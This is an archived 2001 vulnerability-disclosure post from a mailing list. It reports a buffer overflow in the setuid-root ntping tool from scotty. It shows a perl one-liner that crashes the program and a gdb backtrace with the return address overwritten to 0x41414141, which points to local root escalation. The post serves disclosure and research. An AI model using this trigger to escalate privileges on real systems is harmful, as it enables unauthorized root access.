Vulnerability Development mailing list archives
suid scotty (ntping) overflow
From: KF <dotslash () snosoft com>
Date: Tue, 12 Jun 2001 05:34:16 -0400
I am not sure that this made it on to the list the first time I sent it... so sorry if this is a duplicate [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'` Segmentation fault (core dumped) Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/ What led me to research this: arndt () aorta tat physik uni-tuebingen de (Michael Arndt) wrote:
i run scotty-testsuite: what must i change on my system:(Linux slackware): ==== Test generated error: can not connect straps socket: Permission denied
straps and ntping must be installed suid root. ^------- Hrmm I sure thought that was interesting to know *grin* Vendors affected: unknown by the author of this document just a note I found however... <19990702221232.79B119410 () Galois suse de> Hi folks, here is the long promised posting of all suid/sgid files on a alpha of SuSE Linux 6.2 ... comments on wrong permissions are welcome. Please note that SuSE has got 5 full CD-Roms so thats the reason for the many many files ... (and too much suid/sgid ones ...) ... -rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping -rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps ... [root@linux d0tslash]# gdb /usr/bin/ntping core GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 This GDB was configured as "i386-mandrake-linux"... (no debugging symbols found)... Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done. Loaded symbols for /lib/libnsl.so.1 Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/libresolv.so.2 Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 Reading symbols from /lib/libnss_files.so.2...done. Loaded symbols for /lib/libnss_files.so.2 #0 0x40079b66 in getenv () from /lib/libc.so.6 (gdb) bt #0 0x40079b66 in getenv () from /lib/libc.so.6 #1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6 #2 0x4013b9de in __res_ninit () from /lib/libc.so.6 #3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6 #4 0x4013ff5f in gethostbyname () from /lib/libc.so.6 #5 0x080495b8 in _start () #6 0x41414141 in ?? () Cannot access memory at address 0x41414141 -KF
Current thread:
- suid scotty (ntping) overflow KF (Jun 13)
- Re: suid scotty (ntping) overflow Larry W. Cashdollar (Jun 14)
- Re: suid scotty (ntping) overflow Larry W. Cashdollar (Jun 15)
- Re: suid scotty (ntping) overflow Larry W. Cashdollar (Jun 14)